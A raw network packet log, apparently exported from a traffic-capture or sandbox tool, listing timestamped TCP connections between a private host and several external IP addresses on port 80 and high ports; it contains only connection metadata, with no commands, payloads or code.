Aug 26, 2024 23:29:24.356645107 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356657982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356668949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356712103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356712103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356739044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356750965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356760979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356772900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356784105 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356787920 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356796026 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356810093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356821060 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356821060 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356874943 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356888056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356898069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356910944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356920004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356920004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356920958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356933117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.356935978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356980085 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.356980085 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361234903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361246109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361257076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361291885 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361291885 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361341953 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361354113 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361363888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361387968 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361444950 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361531973 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361541986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361552954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361566067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361582041 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361604929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361605883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361617088 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361627102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361640930 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.361644030 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361679077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.361691952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.364401102 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:24.368690014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368702888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368712902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368731022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368741035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368753910 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368755102 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.368767023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368772984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.368787050 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.368799925 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.368937969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368948936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368959904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368971109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368980885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.368987083 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.368993044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369003057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369021893 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369021893 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369055033 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369425058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369435072 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369446039 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369471073 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369488001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369498968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369509935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369513988 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369520903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369539976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369548082 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369589090 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369594097 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369605064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.369676113 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.369676113 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370001078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370012999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370076895 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370132923 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370150089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370161057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370188951 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370188951 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370296955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370306969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370317936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370362043 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370362043 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370436907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370448112 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370459080 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370471001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370482922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370493889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370495081 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370506048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370518923 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370518923 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370538950 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370577097 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370589018 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370604992 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370615959 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370625019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370635986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370642900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370642900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370646954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370657921 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370668888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370678902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370682955 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370682955 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370691061 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:24.370714903 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370755911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370767117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370779037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370790005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370800972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370812893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:24.370840073 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.370894909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:24.555023909 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:24.590178967 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:24.596379042 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:24.780620098 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:24.792973995 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:24.797873020 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:24.864455938 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:24.869494915 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:24.956075907 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:24.962146044 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:24.982955933 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.018784046 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:25.023647070 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.070538044 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.072513103 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:25.077863932 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.207957983 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.246627092 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:25.246761084 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:25.261486053 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:25.273824930 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.275878906 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:25.280680895 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.351819992 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:25.357682943 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357695103 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357705116 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357714891 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357723951 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357734919 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357744932 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357753992 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357763052 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357772112 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357786894 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357795954 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357804060 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357812881 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.357821941 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.478689909 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.479738951 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:25.484765053 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.573246956 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.620842934 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:25.680718899 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.681937933 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:25.686933041 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.777292967 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:25.777803898 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:25.782497883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:25.782555103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:25.782700062 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:25.782756090 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:25.802203894 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:25.808727980 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:25.848736048 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:25.853593111 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:25.855148077 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:25.860044956 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:25.882925987 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:25.895364046 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:25.900262117 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:26.044418097 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:26.089602947 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:26.092571020 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092583895 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092602015 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092613935 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092624903 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092638016 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092719078 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.092719078 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.092761040 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092772007 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092782974 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.092892885 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.093014956 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093029022 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093039036 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093094110 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.093094110 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.093153954 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093170881 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093189955 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093199968 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093209028 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.093211889 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.093267918 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.093267918 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.096339941 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:26.137145042 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:26.177860022 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:26.182766914 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:26.242785931 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242801905 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242814064 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242825985 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242839098 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242841005 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242850065 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242862940 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242863894 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242872953 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242885113 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242897034 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242918015 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242929935 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242937088 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242937088 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242945910 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242964983 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242976904 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242980003 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242980003 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.242988110 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.242999077 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243000031 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243000031 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243026972 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243038893 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243048906 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243048906 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243051052 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243062019 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243102074 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243113995 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243122101 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243122101 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243125916 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243227005 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243244886 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243257046 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243259907 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243268967 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.243283033 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243292093 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.243594885 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.331862926 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.331988096 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.331990957 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.332040071 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.380700111 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:26.392805099 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392860889 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392872095 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392883062 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392899036 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392901897 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.392911911 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392921925 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392934084 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392934084 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.392945051 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.392961025 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.392961025 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393130064 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393178940 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393358946 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393461943 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393474102 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393485069 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393491030 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393496990 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393507957 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393515110 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393526077 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393553972 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393580914 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393594027 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393604994 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393609047 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393615961 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393626928 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393635035 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393640041 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393651009 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393659115 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393659115 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393670082 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393681049 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393692970 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393692970 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393707037 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393713951 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393724918 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393735886 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393735886 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393752098 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393759966 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393790007 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393790960 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393800974 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393811941 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.393819094 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393829107 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.393830061 CEST	80	49733	185.215.113.17	192.168.2.7
